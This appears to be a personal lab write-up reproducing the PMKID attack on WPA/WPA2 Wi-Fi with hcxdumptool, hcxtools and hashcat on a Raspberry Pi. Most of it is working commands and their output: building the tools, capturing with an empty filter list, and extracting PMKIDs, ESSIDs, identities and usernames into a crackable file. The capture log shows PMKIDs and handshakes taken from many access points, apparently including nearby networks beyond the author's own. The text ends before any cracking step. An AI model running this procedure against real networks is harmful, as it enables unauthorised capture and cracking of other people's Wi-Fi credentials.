Having heard about the new attack on WPA/WPA2 using PMKID I am attempting to reproduce.
Prerequisite
I am using a raspberry pi with an Alfa wireless card. The AP is a TPLink N600.
Set up
The first thing I did was clone the repos needed for this attack.
Tools
Clone Hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool.git
Set up
cd hcxdumptool/
make
sudo make install
Clone Hcxtools
git clone https://github.com/ZerBea/hcxtools.git
Set up
cd hcxtools/
sudo apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
make
sudo make install
Clone Hashcat
git clone https://github.com/hashcat/hashcat.git
Or
note: did not seam to work in pi and for pi it was hashcat-data
sudo apt install hashcat
Attack
I started as in the wright up
yojimbo@system76:~/lab/oscp/hcxtools$ sudo hcxdumptool -o test.pcapng -i wlan0mon --enable_status
hcxdumptool: option '--enable_status' requires an argument
invalid argument specified
This is a little annoying.
Taking a guess here but enable status seams like a yes or no kind of thing so I tried the following.
yojimbo@system76:~/lab/oscp/hcxtools$ sudo hcxdumptool -o test.pcapng -i wlan0mon --enable_status true
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc2337c1adb (client)
MAC ACCESS POINT.........: 002067c2943f (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65253
ANONCE...................: dcd78685e6279f9e9b1d1c391b93d59470186e77efde4b1c54853634a4bb4701
Cool! Now this what I expected to see.
The documentation now says that I should see "FOUND PMKID" if the AP supports it and it might take a while.
We recommend running hcxdumptool up to 10 minutes before aborting.
Ran again
yojimbo@system76:~/lab/oscp$ sudo hcxdumptool -i wlan0mon -o test.pcapng --enable_status true
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233a369c4 (client)
MAC ACCESS POINT.........: 3cb87ae4ab08 (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63761
ANONCE...................: 04a1fee32ae5ceeb4e944631c12bf25d95a465615995018c769f19c373f07577
Here I noticed the MAC ACCESS POINT has changed. There must be a way to set the AP MAC.
yojimbo@system76:~$ sudo hcxdumptool --help
hcxdumptool 4.2.1 (C) 2018 ZeroBeat
usage : hcxdumptool <options>
example: hcxdumptool -o output.pcapng -i wlp39s0f3u4u5 -t 5 --enable_status
options:
-i <interface> : interface (monitor mode must be enabled)
ip link set <interface> down
iw dev <interface> set type monitor
ip link set <interface> up
-o <dump file> : output file in pcapngformat
management frames and EAP/EAPOL frames
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-O <dump file> : output file in pcapngformat
unencrypted IPv4 and IPv6 frames
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-W <dump file> : output file in pcapngformat
encrypted WEP frames
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-c <digit> : set scanlist (1,2,3,...)
default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12
maximum entries: 127
allowed channels:
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
34, 36, 38, 40, 42, 44, 46, 48, 52, 56, 58, 60, 62, 64
100, 104, 108, 112, 116, 120, 124, 128, 132,
136, 140, 144, 147, 149, 151, 153, 155, 157
161, 165, 167, 169, 184, 188, 192, 196, 200, 204, 208, 212, 216
-t <seconds> : stay time on channel before hopping to the next channel
default: 5 seconds
-E <digit> : EAPOL timeout
default: 150000 = 1 second
value depends on channel assignment
-D <digit> : deauthentication interval
default: 10 (every 10 beacons)
the target beacon interval is used as trigger
-A <digit> : ap attack interval
default: 10 (every 10 beacons)
the target beacon interval is used as trigger
-I : show suitable wlan interfaces and quit
-h : show this help
-v : show version
--filterlist=<file> : mac filter list
format: 112233445566 + comment
maximum line lenght 128, maximum entries 32
--filtermode=<digit> : mode for filter list
1: use filter list as protection list (default)
2: use filter list as target list
--disable_active_scan : do not transmit proberequests to BROADCAST using a BROADCAST ESSID
do not transmit BROADCAST beacons
affected: ap-less and client-less attacks
--disable_deauthentications : disable transmitting deauthentications
affected: connections between client an access point
deauthentication attacks will not work against protected management frames
--give_up_deauthentications=<digit>: disable transmitting deauthentications after n tries
default: 100 tries (minimum: 4)
affected: connections between client an access point
deauthentication attacks will not work against protected management frames
--disable_disassociations : disable transmitting disassociations
affected: retry (EAPOL 4/4 - M4) attack
--disable_ap_attacks : disable attacks on single access points
affected: client-less (PMKID) attack
--give_up_ap_attacks=<digit> : disable transmitting directed proberequests after n tries
default: 100 tries (minimum: 4)
affected: client-less attack
deauthentication attacks will not work against protected management frames
--disable_client_attacks : disable attacks on single clients
affected: ap-less (EAPOL 2/4 - M2) attack
--do_rcascan : show radio channel assignment (scan for target access points)
you should disable auto scrolling in your terminal settings
--save_rcascan=<file> : output rca scan list to file when hcxdumptool terminated
--save_rcascan_raw=<file> : output file in pcapngformat
unfiltered packets
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
--enable_status=<digit> : enable status messages
bitmask:
1: EAPOL
2: PROBEREQUEST/PROBERESPONSE
4: AUTHENTICATON
8: ASSOCIATION
--help : show this help
--version : show version
I figured it out
pi@raspberrypi:~ $ sudo hcxdumptool -i wlan0mon -o test.pcapng --enable_status 1
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc23344943a (client)
MAC ACCESS POINT.........: 00182555bc46 (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65152
ANONCE...................: e635323d909d8b276972d7c679395d5e088b0c2fe9068f660d75c53699477980
[20:32:34 - 001] ac5d10006b96 -> 000d4ba0fbfd [FOUND PMKID]
[20:32:34 - 001] ac5d10006b96 -> 000d4ba0fbfd [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 24559]
[20:32:35 - 001] 40b03473c8e0 -> 346b4648bc2a [EAPOL 4/4 - M4 RETRY ATTACK]
[20:32:35 - 001] b42a0e0f488b -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:32:37 - 001] 289efc618a66 -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:32:37 - 001] 1cc63c1d9277 -> 28187849d4fd [FOUND PMKID]
[20:32:48 - 005] 90489aeae9a3 -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:32:59 - 011] f82c182e4816 -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:33:03 - 011] 94c1500c0e9e -> 2c3068e4dba1 [FOUND PMKID]
[20:33:03 - 011] 94c1500c0e9e -> 2c3068e4dba1 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 21588]
[20:33:21 - 006] 9c3dcf96791b -> 88dea96707e5 [FOUND PMKID]
[20:33:21 - 006] 9c3dcf96791b -> 6837e9903faa [FOUND PMKID]
[20:33:21 - 006] 9c3dcf96791b -> 88dea96707e5 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 13277]
[20:33:22 - 006] 1c1b68790ed0 -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:33:23 - 006] 14edbbb260fa -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:33:24 - 006] 9c3dcf96791b -> fcc23344943a [FOUND PMKID CLIENT-LESS]
pi@raspberrypi:~ $ sudo hcxpcaptool -z test.16800 test.pcapng
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: armv6l
file os information..........: Linux 4.14.52+
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 4644
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 8
probe responses..............: 24
association requests.........: 857
association responses........: 1723
reassociation requests.......: 2
reassociation responses......: 1
authentications (OPEN SYSTEM): 1255
authentications (BROADCOM)...: 1255
EAPOL packets................: 756
EAPOL PMKIDs.................: 13
best handshakes..............: 6 (ap-less: 1)
13 PMKID(s) written to test.16800
Note: While not required it is recommended to use options -E -I and -U with hcxpcaptool. We can use these files to feed hashcat. They typically produce good results.
-E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
-I retrieve identities from WiFi-traffic
-U retrieve usernames from WiFi-traffic
pi@raspberrypi:~ $ sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: armv6l
file os information..........: Linux 4.14.52+
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 4644
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 8
probe responses..............: 24
association requests.........: 857
association responses........: 1723
reassociation requests.......: 2
reassociation responses......: 1
authentications (OPEN SYSTEM): 1255
authentications (BROADCOM)...: 1255
EAPOL packets................: 756
EAPOL PMKIDs.................: 13
best handshakes..............: 6 (ap-less: 1)
13 PMKID(s) written to test.16800